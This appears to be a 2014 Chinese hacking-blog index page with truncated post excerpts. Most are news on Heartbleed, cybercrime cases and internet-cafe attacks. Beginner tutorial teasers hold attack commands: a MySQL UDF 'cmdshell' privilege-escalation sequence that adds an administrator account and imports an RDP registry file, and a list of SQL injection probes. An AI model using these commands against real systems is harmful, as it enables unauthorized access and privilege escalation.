• 黑客圈:支付账号随意改 不花钱竟能下订单

      2001年,一场持续了7天7夜的“中美黑客大战”让不熟悉网络世界的中国人都认识到一个全新群体——黑客。网络以难以想象的速度在中国快速普及,黑客们针对网络安全而展开的黑帽白帽大战从未停歇过,2013年,全球5.52亿人因为黑客攻击泄露身份资料,而在中国,1.64亿人因为网络犯罪受到侵害,人均损失224美元。   随着智能手机日益普及,1200万个针对智能手机的恶意链接随时...阅读全文
    作者:qxz_xp | 发布:2014年4月30日 | 分类:业界新闻, 黑客攻防 | 暂无评论
  • 网吧黑客攻击无处不在 数据加密摒除后患

      网吧在20世纪末出现在大众的视野中,当时,国内的计算机产业和互联网技术刚刚起步,大多数市民还未配有家庭电脑,或是电脑还未连接网络,网吧就为这样的人群提供了接触互联网的机会。可以说网吧为中国计算机网络的发展做出了相当大的贡献。   随着IT技术与互联网技术的发展,网吧也在变得越来越高端,越来越科技化,并且并没有因为计算机的普及与网络的覆盖而淘汰,...阅读全文
    作者:qxz_xp | 发布:2014年4月24日 | 分类:业界新闻, 黑客攻防 | 1条评论
  • 网吧遭黑客攻击 网管玩“无间道”

    网吧格调高大上,引来黑客攻击。   新开网吧常常断网,客人不满客流骤减,到底是什么情况?无奈,网管扮作客人四处蹲点查作案者。4月20日,蹲点网管发现两名男子进入网吧后不看电影不打游戏,而是打开QQ远程操作,查询网吧电脑IP。   报警后,警察调查才知,这两名网吧客人其中一人是隔壁某网吧的网管。“他们来收集网吧IP地址,然后让黑客攻击这些地址,导致我们电脑瘫...阅读全文
    作者:qxz_xp | 发布:2014年4月22日 | 分类:业界新闻, 黑客攻防 | 暂无评论
  • 3DMatrix黑客帝国数字雨动态壁纸(Android版)

    3D黑客帝国动态壁纸具有最酷最真实的黑客帝国字符雨效果。 它能够立即让你的手机屏幕充满未来感和科技感。 你想让你身边用iPhone的朋友嫉妒吗?赶快安装3D黑客帝国动态壁纸吧。 主要特性:最酷的黑客帝国字符雨效果O喷GL实现并高度优化酷炫火焰效果支持安装到SD卡完整的自定义选项。 下载地址:http://pan.baidu.com/s/1sjKNJmH 阅读全文
    作者:qxz_xp | 发布:2014年4月20日 | 分类:黑客工具, 黑客攻防 | 暂无评论
  • 南京“黑客”黑走武汉一公司8万元

      南京一“黑客”,利用买来的黑客软件盗取了武汉一家游戏充值卡公司8万元。事发后,随着黑客的落网,生产、销售黑客软件的周伟、吉海也随之暴露。可谁也没想到,编写这个黑客软件的高手吉海,他家境殷实,根本就不差钱,可是,当吉海以每月工资2万元的价格聘请他编写黑客软件时,他却答应了。他说:“这个钱赚得太容易了,我躺在床上花一个小时就能搞定。”   在QQ群里卖黑客...阅读全文
    作者:qxz_xp | 发布:2014年4月17日 | 分类:业界新闻, 黑客攻防 | 暂无评论
  • SQLmap简介以及防火墙绕过方法

    简介     许多现实中对于网站的攻击往往是由于网站没有及时更新或者对于用户的输入没有进行检查。从缓冲区溢出说起,这样一种针对系统脆弱性的威胁,最根本的问题还是在于对于用户的输入没有进行检查。作为主要威胁之一的SQL注入带来了人们对于其应用和数据库的担忧。这个问题的出现有十年的时间了,但是现在仍旧在许多网站中出现。SQL注入就像许多当前主要的的web应用安全...阅读全文
    作者:qxz_xp | 发布:2014年4月16日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
  • 浅谈新手寻找XSS时所存在的一些误区

    1. 误区1: XSS,不是专门去“绕过”限制。 打个简单的比方,一个已经被层层把守的大门,面前荆棘无数,而你又单枪匹马的,怎么闯的进去? 这个时候你要意识到,走大门是不可能的。其实我们要突破的城防,有很多小门可以进去的,甚至不需要任何手段就可以直接走进去。我们为什么不走呢? XSS是很好防御的,不就是过滤一下么,所以我们不要太多寄希望与程序员错误的过滤逻辑,...阅读全文
    作者:qxz_xp | 发布:2014年4月12日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
  • “心脏出血”证实波及手机 安天推出检测插件

      OpenSSL“心脏出血”漏洞的严重性远比想象的严重。一些用户没有考虑到,手机上大量应用也需要账号登录,其登录服务也有很多是OpenSSL搭建的,因此在漏洞没有修补好之前,用手机登录过网银、网购等重要账号极容易导致用户账户信息丢失。需要在漏洞修补后及时更改密码。   安天旗下AVL移动安全团队在“漏洞”消息爆出后,迅速对主流的网银、网购、证券、航旅软件的登录入口...阅读全文
    作者:qxz_xp | 发布:2014年4月11日 | 分类:漏洞公布, 网络安全 | 1条评论
  • OpenSSL漏洞转攻个人电脑 360首推修复方案

             OpenSSL“心脏出血”漏洞危害辐射范围正在不断扩大。在思科、Juniper网络设备被曝受此漏洞影响后,Windows上大批软件也被发现存在漏洞,可被黑客利用攻击网民电脑,抓取密钥等隐私数据,而攻击代码已在国外技术网站GitHub上公开。对此360安全卫士于10日晚间紧急推出漏洞修复方案,是目前唯一可预防此漏洞的PC安全软件。  “心脏出血”漏洞刚刚曝出时,黑客主要攻击的...阅读全文
    作者:qxz_xp | 发布:2014年4月11日 | 分类:漏洞公布, 网络安全 | 2条评论
  • “心脏出血”:你需要尽快更改这些密码

    “Heartbleed”是什么?“心脏出血”漏洞,OpenSSL有史以来最具灾难性的一个漏洞,可能已经被发现和利用2年之久,前几天才公布,过多的不介绍了,知道严重性就行。 这个漏洞将影响所有使用https加密协议的网站和服务,包括且不仅包括Gmail和Facebook——这些网站可能已经被恶意人士监听,从而获取到你的重要信息,包括且不仅包括账号、密码、信用卡号密码等。 我们也不知道究竟有...阅读全文
    作者:qxz_xp | 发布:2014年4月11日 | 分类:安全知识, 漏洞公布, 网络安全 | 暂无评论
  • mysql提权方法总结四则

    一 UDF提权 这类提权方法我想大家已经知道了,我大致写一下,具体语句如下: create function cmdshell returns string soname ’udf.dll’  select cmdshell(’net user iis_user /add’);  select cmdshell(’net localgroup administrators iis_user /add’);  select cmdshell(’regedit /s d:\web\3389.reg’);  drop function cmdshell;  select cmdshell(’netstat -an’); 二 ...阅读全文
    作者:qxz_xp | 发布:2014年4月06日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
  • 手工注入命令总汇

    1.判断是否有注入;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.注入参数是字符’and [查询条件] and ”=’ 4.搜索时没过滤参数的’and [查询条件] and ‘%25’=’ 5.判断数据库系统  ;and (select count(*) from sysobjects)>0 mssql  ;and (select count(*) from msysobjects)>0 access 6.猜数据库;and (select Co...阅读全文
    作者:qxz_xp | 发布:2014年4月01日 | 分类:菜鸟入门, 黑客攻防 | 1条评论